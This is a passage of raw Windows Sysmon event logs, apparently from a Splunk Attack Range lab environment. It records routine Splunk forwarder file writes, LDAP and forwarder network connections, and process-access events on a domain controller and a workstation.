Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3865EF0DD6CAA30B8C1856C252399156,SHA256=B65A7769734CA0F9C8BBF782D9D8E90905E093B21E6E15AF4FF739FD0046819E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.455{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D80EBCFADFF9C5C564F3D119D29C868,SHA256=4FA31A6F906F8581B670123DC319A4C6E719250E0D9F8C31C2290CC591228ACF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808623Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:16.962{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46FEF46B93D347555EAF6479CA724AA7,SHA256=DB5EDDB40424CA9DD04CF9DB19CFE3FA73BCA3AA704A6EF7899FFCAAB0FC5CD5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:07.992{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51109-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001051639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:07.992{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51109-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001051638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:16.002{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C4AB6AB912804F5A3235E06879A63F7,SHA256=EB0F030F3CE623362BB703C18363FE1F4C3565A61CAC9803D412D7C151085C03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808624Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:17.978{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7FDF546CD3D93F803A44B344338570E,SHA256=19EF6D55CF990BA1716C47EC507F200001544FF530CC1EE959CD723A8683BFBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:17.002{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08A221D5C7CEBA83E78778F17D211968,SHA256=BE4274D5F7A5B791755E324CADDBE2E1C8FFE0A2CE4AB4F69C865D7B3866C06A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:18.370{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:18.020{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED97C9B7D2389BBEE023BA549680150F,SHA256=203D23BF904FCFC472D7812A585CA9AFD04CA5DF25B401259142A54229CA622D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808625Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:17.188{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57342-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:19.038{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8DA7F5DB66DBED65BDA1FE1B82E537B,SHA256=7521253E7FCD8AEB117179D797D0FB8F833729655D63586FD0AF80CC6F356D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808626Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:19.025{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98A4ADD6AEA26E7F9513B50A53349237,SHA256=364F47BD41BB6B3243C22793EDD2693D33B2EBDFC9768A31BD73B46C646820E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808628Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:20.650{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808627Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:20.040{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFAC3A699F653825DC638A86729D3D1B,SHA256=9B8B0245794ABA75F4B08C794356BF8F992CDAE53224653DDC748BE3F442D852,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:12.574{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51110-false10.0.1.12-8000- 23542300x80000000000000001051645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:20.053{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ABC6D9D873EC999F49A3A6D8DAAA8FA,SHA256=AA81A734161EB72B1DF45F13FA7DB5AE58A4B19A11B4B6A18BA7D0168053BF95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:21.068{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B3F7376327103E1075EFB7FA5C7C674,SHA256=92888EA534C0154DEA3F25A85DF06933DA00527ABD85457EE5AF7B50E3DBC685,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808629Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:21.056{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B49E5F14ECF900E7A2186C86510331D,SHA256=AEBA3251922DE553CF514651AE77F0AA8608B5A09A4DF9163B771E55A9C7269C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:22.083{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8152F84FA20A85DD9A3E280D60D5D999,SHA256=4D04DD5D584B8784D6E4A76DCAD421C4877F92B4F5D980A3EC4FF9F850511727,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808631Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:20.782{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57343-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000808630Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:22.071{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0444BC1B96DFA52FEFDE8605893EFD9F,SHA256=7FE9E1EDF27AB305EE21004B8B9813542C1C59CFB0970C4DFAB9565E379EE90C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:23.117{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8B79030DE60437AD8D636B4B8E458B7,SHA256=11B7485F669CF03267C82AC3F2FEB2255D75599E48F8F1736BBAB6677E498E4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808633Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:22.360{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57344-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808632Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:23.071{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=472B8221E481086BD4BECFF43EE1F665,SHA256=922A4876A8C0D7CDA83DA03A766AE538D6B645B3B38F966562AA5E9270FD2A23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:24.136{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD35F915C6150769F370E7880882FA4E,SHA256=FDD2521E7BCC844560CAAA3E0A24D4058E13C7FC7F96D9B432C2F9EC45EF5296,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808661Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.993{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F620-60EB-9E79-00000000D001}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808660Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808659Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808658Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808657Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808656Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808655Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808654Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808653Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808652Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808651Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.978{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F620-60EB-9E79-00000000D001}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808650Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.978{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F620-60EB-9E79-00000000D001}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808649Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.978{0C1E0330-F620-60EB-9E79-00000000D001}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000808648Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.509{0C1E0330-F620-60EB-9D79-00000000D001}3996828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808647Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 